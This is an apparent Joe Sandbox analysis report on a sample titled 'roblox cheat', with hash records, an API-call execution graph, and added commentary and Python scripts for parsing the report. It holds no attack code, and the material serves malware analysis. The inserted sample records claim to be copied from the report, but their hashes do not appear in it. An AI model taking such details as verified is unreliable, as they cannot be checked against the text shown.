                                                                                  • Opcode Fuzzy Hash: e765975fe494f2ad97240aacf8422cf36a3c5a3ee71bf30d526f55154af3862e
                                                                                  • Instruction Fuzzy Hash: 2B71C130B08201CFEB5A9BB9A45863F3BBBAFC4644719442DD906CF386DE34CC069791
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1349230479.0000000001A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A50000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1a50000_roblox cheat.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a82601b996226ad5c1ebb364bc56d4a4850cfaea6a1547b89fadaab208146170
                                                                                  • Instruction ID: e350ef356eeea30d7126f70fcb825562adcd13d7b1543ae69d733b3e94d40c06
                                                                                  • Opcode Fuzzy Hash: a82601b996226ad5c1ebb364bc56d4a4850cfaea6a1547b89fadaab208146170
                                                                                  • Instruction Fuzzy Hash: 5651F031B093009FDB559FB9D85566EBBF6BFCA210B19846EE806CB395CA318C06C791
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1349230479.0000000001A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A50000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1a50000_roblox cheat.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: db3c73bdb13a0cd14502bd626b9153d85ade996ebdf2b520d987b00de7b0b004
                                                                                  • Instruction ID: a51a54b67850554c90d4a30b0756b1d58e63b5b78ef8fffaf1fb412430b50b98
                                                                                  • Opcode Fuzzy Hash: db3c73bdb13a0cd14502bd626b9153d85ade996ebdf2b520d987b00de7b0b004
                                                                                  • Instruction Fuzzy Hash: 85519B38346651CFC76B9F79A42843E76B6BB8AA01349805EE852DF398CF345C07DB91
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1349230479.0000000001A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A50000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1a50000_roblox cheat.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d4a192c391199975bdd1578a32710bccbb2c7f0ad06f2b0c437fa521752fd556
                                                                                  • Instruction ID: a9c1cf4f91b4776221508e199c8936c3d93222896ac7520d418f6d9f5f0ab38e
                                                                                  • Opcode Fuzzy Hash: d4a192c391199975bdd1578a32710bccbb2c7f0ad06f2b0c437fa521752fd556
                                                                                  • Instruction Fuzzy Hash: 36210574E002098FDB04CFA9D9849EEBBF1FF89300F10856AD914AB261DB345A45CF60
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1349230479.0000000001A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A50000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1a50000_roblox cheat.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 9f2257961b566dcfd58878c2a184356d4bf4b070502d6a2c1532ec0462a3d282
                                                                                  • Instruction ID: f89bb3bfeea3b41b2d02fb87be6f1fd66bda5686bfc7200f6720687b2eeae0ad
                                                                                  • Opcode Fuzzy Hash: 9f2257961b566dcfd58878c2a184356d4bf4b070502d6a2c1532ec0462a3d282
                                                                                  • Instruction Fuzzy Hash: ED1104317092448FD7154BB9D8586ABBBFBBFCA200B19847BE406CB359CE348C0A9761
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1349230479.0000000001A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A50000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1a50000_roblox cheat.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ff80c9071438ed849410ab2ec55f7cbb13fa66844ec3d729f64c62675f7eaace
                                                                                  • Instruction ID: b77f3e1a087e6b2cae5e27eba9424aeb7272b8965e77f21785eb96c0e744c7a2
                                                                                  • Opcode Fuzzy Hash: ff80c9071438ed849410ab2ec55f7cbb13fa66844ec3d729f64c62675f7eaace
                                                                                  • Instruction Fuzzy Hash: A021B474E002098FDB04DFA9D544AEEBBF5FB8D300F10856AD915AB350DB359A45CFA1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1349230479.0000000001A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A50000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1a50000_roblox cheat.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 485d6eeeee7d021195e80c930717a626240f11b5eb452300495f77b613bcc319
                                                                                  • Instruction ID: 82688a4855382e8f142a14354f3743f6fd2655e7ce6f350e6a391410e1b62710
                                                                                  • Opcode Fuzzy Hash: 485d6eeeee7d021195e80c930717a626240f11b5eb452300495f77b613bcc319
                                                                                  • Instruction Fuzzy Hash: D501DD317092449FD7151A7A98146ABBAEBAFCD210B598477E906C7389CD388C095761
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1349230479.0000000001A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A50000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1a50000_roblox cheat.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 7f21a659e2559e5a5acede330fcebf8bab5cbbd228b14ff3955ec69e7890d256
                                                                                  • Instruction ID: 628dc3653d930a2289e7f231025f706db4aa315fdca39cabdd4477b74fc4cfc6
                                                                                  • Opcode Fuzzy Hash: 7f21a659e2559e5a5acede330fcebf8bab5cbbd228b14ff3955ec69e7890d256
                                                                                  • Instruction Fuzzy Hash: EA1127B4E08249CFCB05CFA9D5449ADBBF1EF4A310B2485EAD864AB361D7345A01DB91
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1349230479.0000000001A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A50000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1a50000_roblox cheat.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 147d3275026f1dfba70ffadcd3f76df7037382d86db1362efeb8f2c1def6c406
                                                                                  • Instruction ID: 2e40a9024dd594a0fd8d10a9e9fe0cf7af7b416c67c37124403ed9662082bbb5
                                                                                  • Opcode Fuzzy Hash: 147d3275026f1dfba70ffadcd3f76df7037382d86db1362efeb8f2c1def6c406
                                                                                  • Instruction Fuzzy Hash: 0B01E574A0520ACFCB41DFA9D9408ADBBB4FF49200B1045AAD815BB712D7319D05CF61
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1349230479.0000000001A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A50000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1a50000_roblox cheat.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 0e890299fd28a7d5debf2491d013eabd4b1afd9cdb3a1a560b03c894ea021639
                                                                                  • Instruction ID: 4ca275727e6e0d2348b5634733c73b4839e3712772e8f331eef0918dffec6e14
                                                                                  • Opcode Fuzzy Hash: 0e890299fd28a7d5debf2491d013eabd4b1afd9cdb3a1a560b03c894ea021639
                                                                                  • Instruction Fuzzy Hash: 17E01270D453099FCB94DFB4C4456AEBFF0EB49210F10416AD814EA205E3700A518FC1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1349230479.0000000001A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A50000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1a50000_roblox cheat.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 99f250dbed79ec3e5242181d2503b2e08de415b56c28a20c95198bcddbac1618
                                                                                  • Instruction ID: 323ff1fcf07100292a6eef931b3ba8c9330df532771c81ba6e37ee656bf06bdf
                                                                                  • Opcode Fuzzy Hash: 99f250dbed79ec3e5242181d2503b2e08de415b56c28a20c95198bcddbac1618
                                                                                  • Instruction Fuzzy Hash: FFE0EC70D042099FCB94EFA9C54666EBBF4AB48200F10816AD818D6244E7705A508BC1
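Every "Memory Dump Source" record above comes from the same dump (base 01A50000, "based on PE: false"), and in every record the Opcode ID is identical to the Opcode Fuzzy Hash while the Instruction ID differs from the Instruction Fuzzy Hash. When triaging a report of this size it helps to pull those records into a structure instead of reading them one by one. The following Python is an added example, not code from the Joe Sandbox report or from Joe Security: it parses the bullet records, splits the packed "Source File / Offset / based on PE" line, and summarises per dump. The decoding of the dotted .sdmp file name (field 4 as the region base, field 5 as the Win32 page protection) is an assumption; the page only shows that field 4 equals the Offset field, so the code records whether that agreement holds rather than relying on it.

```python
"""Parse the per-function 'Memory Dump Source' records of a Joe Sandbox
report and summarise which memory region the disassembled code came from."""
from __future__ import annotations

import re
from collections import Counter

FIELD = re.compile(r"^\s*•\s*([^:]+):\s*(.*)$")
# Win32 page-protection constants from winnt.h.
PAGE_PROTECTION = {
    0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE",
}


def parse_memory_dump_blocks(text: str) -> list[dict[str, str]]:
    """One dict per 'Memory Dump Source' heading. Only bullet lines carry
    values; 'Joe Sandbox IDA Plugin' and 'Similarity' are sub-headings.
    The Source File bullet packs three fields on one line and is split."""
    blocks: list[dict[str, str]] = []
    for line in text.splitlines():
        if line.strip() == "Memory Dump Source":
            blocks.append({})
            continue
        m = FIELD.match(line)
        if not (m and blocks):
            continue
        key, value = m.group(1).strip(), m.group(2).strip()
        if key == "Source File":
            parts = value.split(", ")
            blocks[-1][key] = parts[0]
            for extra in parts[1:]:
                k, v = extra.split(": ", 1)
                blocks[-1][k] = v
        else:
            blocks[-1][key] = value
    return blocks


def decode_dump_name(name: str) -> dict[str, object]:
    """Split the dotted .sdmp name. ASSUMPTION (not documented on the page):
    field 4 is the region base, which matches the 'Offset' field in every
    record here, and field 5 is the region's Win32 page protection."""
    fields = name.split(".")
    base, prot = int(fields[3], 16), int(fields[4], 16)
    return {"base": base, "protection": PAGE_PROTECTION.get(prot, hex(prot))}


def summarize(blocks: list[dict[str, str]]) -> dict[str, dict[str, object]]:
    """Per dump: number of functions, decoded base/protection, whether the
    region was PE-backed, and whether the name's base agrees with Offset."""
    counts = Counter(b["Source File"] for b in blocks)
    summary: dict[str, dict[str, object]] = {}
    for name, n in counts.items():
        rec = next(b for b in blocks if b["Source File"] == name)
        info = decode_dump_name(name)
        summary[name] = {
            "functions": n,
            "base": hex(info["base"]),
            "protection": info["protection"],
            "pe_backed": rec["based on PE"] == "true",
            "offset_matches_name": info["base"] == int(rec["Offset"], 16),
        }
    return summary


def opcode_ids_match_hashes(blocks: list[dict[str, str]]) -> bool:
    """True when every record's Opcode ID equals its Opcode Fuzzy Hash."""
    return all(b["Opcode ID"] == b["Opcode Fuzzy Hash"] for b in blocks)


# First two records copied from the report above (indentation trimmed).
SAMPLE = """
Memory Dump Source
• Source File: 00000000.00000002.1349230479.0000000001A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1a50000_roblox cheat.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: eae3e544fc0c88a27e752672e2fc98ab729e13e68aee0e20f4b534476427e410
• Instruction ID: fcc128346b224c82ef692a98708ac983a61900a952c56c0cf6a02b52412c2caf
• Opcode Fuzzy Hash: eae3e544fc0c88a27e752672e2fc98ab729e13e68aee0e20f4b534476427e410
• Instruction Fuzzy Hash: 5BA2E370C68369CFDBA69F34C8822CAB7F0FF56724B14845ED891AD65DD7324902CB89
Memory Dump Source
• Source File: 00000000.00000002.1349230479.0000000001A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1a50000_roblox cheat.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 24f4c8e44bc9df20ee4f975f16a89daecbe19f02e239dab181bc933a5f0ddb0a
• Instruction ID: 76712ad67ad3e085b87a40651690a35d16c77e5cc4f5751c1e88b1850153eb86
• Opcode Fuzzy Hash: 24f4c8e44bc9df20ee4f975f16a89daecbe19f02e239dab181bc933a5f0ddb0a
• Instruction Fuzzy Hash: D83268B4A01229CFDBA4DFA9D994B9DBBB1BB49300F1181EAD91DA7354DB305E84CF10
"""

if __name__ == "__main__":
    recs = parse_memory_dump_blocks(SAMPLE)
    for name, s in summarize(recs).items():
        print(name, s)
    print("Opcode ID == Opcode Fuzzy Hash everywhere:", opcode_ids_match_hashes(recs))
```

The useful output is the per-dump line: all disassembled functions sit in one private region that is not backed by a PE image, which is what one expects from code unpacked or decrypted at runtime rather than loaded from the file on disk. The empty API ID / String ID fields mean the plugin found no API references or strings to use for similarity matching in these functions, so the fuzzy hashes are the only handle for comparing them against other samples.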

Execution Graph

Execution Coverage: 13.8%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 3.7%
Total number of Nodes: 493
Total number of Limit Nodes: 6
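The execution_graph that follows has been flattened by extraction into one token stream: a node is a numeric id followed by a lowercase hex function address and optional labels (API names, CRT symbol names, or a summarised "N API calls"), and an edge is written as "src->dst". In that form it is hard to answer the question a reverser actually has, namely which API calls a given function reaches. The Python below is an added example, not part of the Joe Sandbox report: it tokenises the stream back into nodes and edges and walks the edges to collect reachable API names. The heuristics for telling a node id, an address, an API name and a CRT symbol apart are assumptions made from the visible text (addresses always contain a hex letter, API names are CamelCase, CRT symbols start with an underscore); the sample is an excerpt copied from the start of the graph. One caveat the query makes visible: the clusters SetUnhandledExceptionFilter / UnhandledExceptionFilter / GetCurrentProcess / TerminateProcess reached through _ValidateLocalCookies, and GetSystemTimeAsFileTime / GetCurrentThreadId / GetCurrentProcessId / QueryPerformanceCounter at node 2001, match the MSVC runtime's security-cookie initialisation and failure-reporting code, so they should be checked against the CRT before being read as sample-specific anti-analysis logic.

```python
"""Parse a Joe Sandbox 'execution_graph' dump (flattened to one token stream)
back into nodes and edges, and query which Win32 APIs a function reaches."""
from __future__ import annotations

import re
from collections import defaultdict, deque
from dataclasses import dataclass, field

NODE_ID = re.compile(r"^\d+$")
# ASSUMPTION: addresses are lowercase hex; requiring a letter keeps a decimal
# node id from ever being read as an address.
ADDRESS = re.compile(r"^(?=.*[a-f])[0-9a-f]{5,8}$")
EDGE = re.compile(r"^(\d+)->(\d+)$")
# ASSUMPTION: API names are CamelCase; CRT symbols start with '_', and the
# tokens 'API'/'calls' come from the summarised 'N API calls' annotation.
API_NAME = re.compile(r"^[A-Z][A-Za-z0-9]+$")


@dataclass
class Node:
    node_id: int
    address: str
    labels: list[str] = field(default_factory=list)

    def apis(self) -> list[str]:
        return [t for t in self.labels if API_NAME.match(t) and t != "API"]


@dataclass
class ExecutionGraph:
    nodes: dict[int, Node]
    edges: list[tuple[int, int]]

    def by_address(self) -> dict[str, list[int]]:
        """Several node ids can share one address: the plugin emits a
        separate summary node for each call site of the same function."""
        out: dict[str, list[int]] = defaultdict(list)
        for node in self.nodes.values():
            out[node.address].append(node.node_id)
        return dict(out)

    def reachable_apis(self, start: int) -> list[str]:
        """Breadth-first walk over the edges from `start` (inclusive),
        collecting every API name on the nodes visited."""
        succ: dict[int, list[int]] = defaultdict(list)
        for src, dst in self.edges:
            succ[src].append(dst)
        seen, queue, apis = {start}, deque([start]), set()
        while queue:
            nid = queue.popleft()
            if nid in self.nodes:
                apis.update(self.nodes[nid].apis())
            for nxt in succ[nid]:
                if nxt not in seen:
                    seen.add(nxt)
                    queue.append(nxt)
        return sorted(apis)


def parse_execution_graph(text: str) -> ExecutionGraph:
    tokens = text.split()
    nodes: dict[int, Node] = {}
    edges: list[tuple[int, int]] = []
    current: Node | None = None
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        if m := EDGE.match(tok):
            edges.append((int(m.group(1)), int(m.group(2))))
        elif NODE_ID.match(tok) and i + 1 < len(tokens) and ADDRESS.match(tokens[i + 1]):
            current = Node(int(tok), tokens[i + 1])
            nodes[current.node_id] = current
            i += 1  # the address token belongs to this node
        elif current is not None:
            current.labels.append(tok)  # the leading 'execution_graph' word precedes any node
        i += 1
    return ExecutionGraph(nodes, edges)


# Excerpt copied from the start of this report's execution_graph.
SAMPLE_GRAPH = """execution_graph 1396 d16350 1397 d1636e 1396->1397 1410 d16310 1397->1410
1399 d1641d 1400 d163ee 1400->1399 1402 d16310 _ValidateLocalCookies 5 API calls 1400->1402
1401 d1638c ___except_validate_context_record 1401->1399 1401->1400
1406 d1642a __IsNonwritableInCurrentImage 1401->1406 1402->1399 1403 d1dfd0 RtlUnwind
1404 d16477 1403->1404 1405 d16310 _ValidateLocalCookies 5 API calls 1404->1405 1407 d1649d
1405->1407 1406->1403 1408 d231dc 14 API calls 1407->1408 1409 d164c5 1407->1409 1408->1409
1411 d16322 1410->1411 1412 d1632f 1410->1412 1414 d12f6a 1411->1414
1415 d12f73 IsProcessorFeaturePresent 1414->1415 1416 d12f72 1414->1416 1418 d12fb5 1415->1418
1416->1412 1421 d12f78 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess
TerminateProcess 1418->1421 1420 d13098 1420->1412 1421->1420"""

if __name__ == "__main__":
    g = parse_execution_graph(SAMPLE_GRAPH)
    print(len(g.nodes), "nodes,", len(g.edges), "edges")
    for addr, ids in g.by_address().items():
        if len(ids) > 1:
            print(addr, "appears as nodes", ids)
    print("APIs reachable from 1396 (d16350):", g.reachable_apis(1396))
    print("APIs reachable from 1401 (d1638c):", g.reachable_apis(1401))
```

Running it on the excerpt shows that d16310 appears three times (nodes 1410, 1402 and 1405), once as the function itself and twice as "_ValidateLocalCookies 5 API calls" summary nodes, and that everything reachable from 1396 ends in the IsProcessorFeaturePresent / SetUnhandledExceptionFilter / UnhandledExceptionFilter / GetCurrentProcess / TerminateProcess chain. Feeding the full graph text from the report into parse_execution_graph works the same way and lets you query the nodes that carry the sample's own calls (LoadLibraryExW, GetProcAddress, TlsGetValue, SetConsoleCtrlHandler and so on) instead of scanning the token stream by eye.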
                                                                                  execution_graph 1396 d16350 1397 d1636e 1396->1397 1410 d16310 1397->1410 1399 d1641d 1400 d163ee 1400->1399 1402 d16310 _ValidateLocalCookies 5 API calls 1400->1402 1401 d1638c ___except_validate_context_record 1401->1399 1401->1400 1406 d1642a __IsNonwritableInCurrentImage 1401->1406 1402->1399 1403 d1dfd0 RtlUnwind 1404 d16477 1403->1404 1405 d16310 _ValidateLocalCookies 5 API calls 1404->1405 1407 d1649d 1405->1407 1406->1403 1408 d231dc 14 API calls 1407->1408 1409 d164c5 1407->1409 1408->1409 1411 d16322 1410->1411 1412 d1632f 1410->1412 1414 d12f6a 1411->1414 1415 d12f73 IsProcessorFeaturePresent 1414->1415 1416 d12f72 1414->1416 1418 d12fb5 1415->1418 1416->1412 1421 d12f78 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 1418->1421 1420 d13098 1420->1412 1421->1420 1990 d1df40 1991 d1df52 1990->1991 1993 d1df60 1990->1993 1992 d12f6a _ValidateLocalCookies 5 API calls 1991->1992 1992->1993 1994 d12820 1997 d134e2 1994->1997 1996 d12825 1996->1996 1998 d134f8 1997->1998 2000 d13501 1998->2000 2001 d13495 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 1998->2001 2000->1996 2001->2000 2002 d3383b 2003 d33847 ___free_lconv_mon 2002->2003 2008 d34802 EnterCriticalSection 2003->2008 2005 d33856 2009 d338b6 2005->2009 2008->2005 2012 d3484a LeaveCriticalSection 2009->2012 2011 d338a8 2012->2011 1422 d2443f 1423 d2444b ___free_lconv_mon 1422->1423 1424 d24452 GetLastError ExitThread 1423->1424 1425 d2445f 1423->1425 1436 d3a1c5 GetLastError 1425->1436 1427 d24464 1491 d3d0f8 1427->1491 1431 d2447b 1496 d2461e 1431->1496 1437 d3a1e1 1436->1437 1438 d3a1db 1436->1438 1442 d3a1e5 1437->1442 1507 d3cd5a 1437->1507 1502 d3cd1b 1438->1502 1444 d3a26a SetLastError 1442->1444 1443 d3a205 1512 d3b99b 1443->1512 1446 d3a275 1444->1446 1447 d3a27a 1444->1447 1446->1427 1530 d2462c 1447->1530 1450 d3a22b 1453 d3cd5a 
___free_lconv_mon 6 API calls 1450->1453 1451 d3a21a 1452 d3cd5a ___free_lconv_mon 6 API calls 1451->1452 1455 d3a228 1452->1455 1456 d3a237 1453->1456 1454 d3a27f 1457 d3a291 1454->1457 1460 d3cd1b ___free_lconv_mon 6 API calls 1454->1460 1519 d3a4b0 1455->1519 1458 d3a252 1456->1458 1459 d3a23b 1456->1459 1461 d3cd5a ___free_lconv_mon 6 API calls 1457->1461 1466 d3a297 1457->1466 1525 d39ff3 1458->1525 1462 d3cd5a ___free_lconv_mon 6 API calls 1459->1462 1460->1457 1465 d3a2ab 1461->1465 1462->1455 1465->1466 1469 d3a2af 1465->1469 1471 d2462c 43 API calls 1466->1471 1472 d3a29c 1466->1472 1467 d3a24f 1467->1444 1470 d3b99b ___free_lconv_mon 14 API calls 1469->1470 1474 d3a2bb 1470->1474 1475 d3a315 1471->1475 1472->1427 1473 d3a4b0 ___free_lconv_mon 14 API calls 1473->1467 1476 d3a2c3 1474->1476 1477 d3a2d8 1474->1477 1478 d3cd5a ___free_lconv_mon 6 API calls 1476->1478 1479 d3cd5a ___free_lconv_mon 6 API calls 1477->1479 1480 d3a2cf 1478->1480 1481 d3a2e4 1479->1481 1484 d3a4b0 ___free_lconv_mon 14 API calls 1480->1484 1482 d3a2f7 1481->1482 1483 d3a2e8 1481->1483 1486 d39ff3 ___free_lconv_mon 14 API calls 1482->1486 1485 d3cd5a ___free_lconv_mon 6 API calls 1483->1485 1488 d3a2d5 1484->1488 1485->1480 1487 d3a302 1486->1487 1489 d3a4b0 ___free_lconv_mon 14 API calls 1487->1489 1488->1466 1490 d3a309 1489->1490 1490->1472 1492 d2446f 1491->1492 1493 d3d10a GetPEB 1491->1493 1492->1431 1499 d3d003 1492->1499 1493->1492 1494 d3d11d 1493->1494 1975 d3cb8d 1494->1975 1978 d244f4 1496->1978 1498 d2462b 1500 d3caca ___free_lconv_mon 5 API calls 1499->1500 1501 d3d01f 1500->1501 1501->1431 1542 d3caca 1502->1542 1505 d3cd52 TlsGetValue 1506 d3cd40 1506->1437 1508 d3caca ___free_lconv_mon 5 API calls 1507->1508 1509 d3cd76 1508->1509 1510 d3cd94 TlsSetValue 1509->1510 1511 d3a1fd 1509->1511 1511->1442 1511->1443 1517 d3b9a8 ___free_lconv_mon 1512->1517 1513 d3b9e8 1560 d1e672 1513->1560 1514 d3b9d3 HeapAlloc 1515 d3a212 1514->1515 1514->1517 1515->1450 1515->1451 
1517->1513 1517->1514 1557 d425ed 1517->1557 1520 d3a4bb RtlFreeHeap 1519->1520 1521 d3a4e5 1519->1521 1520->1521 1522 d3a4d0 GetLastError 1520->1522 1521->1467 1523 d3a4dd ___free_lconv_mon 1522->1523 1524 d1e672 ___free_lconv_mon 12 API calls 1523->1524 1524->1521 1599 d39e87 1525->1599 1741 d33980 1530->1741 1533 d2463c 1534 d24646 IsProcessorFeaturePresent 1533->1534 1535 d24665 1533->1535 1537 d24652 1534->1537 1792 d3447d 1535->1792 1786 d1e378 1537->1786 1541 d246a9 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 1541->1454 1543 d3caf8 1542->1543 1547 d3caf4 1542->1547 1543->1547 1549 d3c9ff 1543->1549 1546 d3cb12 GetProcAddress 1546->1547 1548 d3cb22 ___free_lconv_mon 1546->1548 1547->1505 1547->1506 1548->1547 1555 d3ca10 ___free_lconv_mon 1549->1555 1550 d3caa6 1550->1546 1550->1547 1551 d3ca2e LoadLibraryExW 1552 d3ca49 GetLastError 1551->1552 1553 d3caad 1551->1553 1552->1555 1553->1550 1554 d3cabf FreeLibrary 1553->1554 1554->1550 1555->1550 1555->1551 1556 d3ca7c LoadLibraryExW 1555->1556 1556->1553 1556->1555 1563 d4261a 1557->1563 1574 d3a316 GetLastError 1560->1574 1562 d1e677 1562->1515 1564 d42626 ___free_lconv_mon 1563->1564 1569 d34802 EnterCriticalSection 1564->1569 1566 d42631 1570 d4266d 1566->1570 1569->1566 1573 d3484a LeaveCriticalSection 1570->1573 1572 d425f8 1572->1517 1573->1572 1575 d3a332 1574->1575 1576 d3a32c 1574->1576 1578 d3cd5a ___free_lconv_mon 6 API calls 1575->1578 1580 d3a336 1575->1580 1577 d3cd1b ___free_lconv_mon 6 API calls 1576->1577 1577->1575 1579 d3a34e 1578->1579 1579->1580 1581 d3a356 1579->1581 1582 d3a3bb SetLastError 1580->1582 1583 d3b99b ___free_lconv_mon 12 API calls 1581->1583 1582->1562 1584 d3a363 1583->1584 1585 d3a36b 1584->1585 1586 d3a37c 1584->1586 1587 d3cd5a ___free_lconv_mon 6 API calls 1585->1587 1588 d3cd5a ___free_lconv_mon 6 API calls 1586->1588 1596 d3a379 1587->1596 1589 d3a388 1588->1589 1590 d3a3a3 1589->1590 1591 d3a38c 1589->1591 1592 d39ff3 ___free_lconv_mon 12 API calls 1590->1592 1593 
d3cd5a ___free_lconv_mon 6 API calls 1591->1593 1595 d3a3ae 1592->1595 1593->1596 1594 d3a4b0 ___free_lconv_mon 12 API calls 1597 d3a3a0 1594->1597 1598 d3a4b0 ___free_lconv_mon 12 API calls 1595->1598 1596->1594 1597->1582 1598->1597 1600 d39e93 ___free_lconv_mon 1599->1600 1613 d34802 EnterCriticalSection 1600->1613 1602 d39e9d 1614 d39ecd 1602->1614 1605 d39f99 1606 d39fa5 ___free_lconv_mon 1605->1606 1618 d34802 EnterCriticalSection 1606->1618 1608 d39faf 1619 d3a17a 1608->1619 1610 d39fc7 1623 d39fe7 1610->1623 1613->1602 1617 d3484a LeaveCriticalSection 1614->1617 1616 d39ebb 1616->1605 1617->1616 1618->1608 1620 d3a1b0 ___free_lconv_mon 1619->1620 1621 d3a189 ___free_lconv_mon 1619->1621 1620->1610 1621->1620 1626 d434ce 1621->1626 1740 d3484a LeaveCriticalSection 1623->1740 1625 d39fd5 1625->1473 1627 d4354e 1626->1627 1630 d434e4 1626->1630 1628 d4359c 1627->1628 1631 d3a4b0 ___free_lconv_mon 14 API calls 1627->1631 1694 d4363f 1628->1694 1630->1627 1633 d43517 1630->1633 1638 d3a4b0 ___free_lconv_mon 14 API calls 1630->1638 1632 d43570 1631->1632 1634 d3a4b0 ___free_lconv_mon 14 API calls 1632->1634 1635 d43539 1633->1635 1640 d3a4b0 ___free_lconv_mon 14 API calls 1633->1640 1636 d43583 1634->1636 1637 d3a4b0 ___free_lconv_mon 14 API calls 1635->1637 1639 d3a4b0 ___free_lconv_mon 14 API calls 1636->1639 1641 d43543 1637->1641 1643 d4350c 1638->1643 1645 d43591 1639->1645 1646 d4352e 1640->1646 1647 d3a4b0 ___free_lconv_mon 14 API calls 1641->1647 1642 d4360a 1648 d3a4b0 ___free_lconv_mon 14 API calls 1642->1648 1654 d427d2 1643->1654 1644 d435aa 1644->1642 1652 d3a4b0 14 API calls ___free_lconv_mon 1644->1652 1650 d3a4b0 ___free_lconv_mon 14 API calls 1645->1650 1682 d42c86 1646->1682 1647->1627 1653 d43610 1648->1653 1650->1628 1652->1644 1653->1620 1655 d427e3 1654->1655 1656 d428cc 1654->1656 1657 d427f4 1655->1657 1658 d3a4b0 ___free_lconv_mon 14 API calls 1655->1658 1656->1633 1659 d42806 1657->1659 1661 d3a4b0 ___free_lconv_mon 14 API calls 
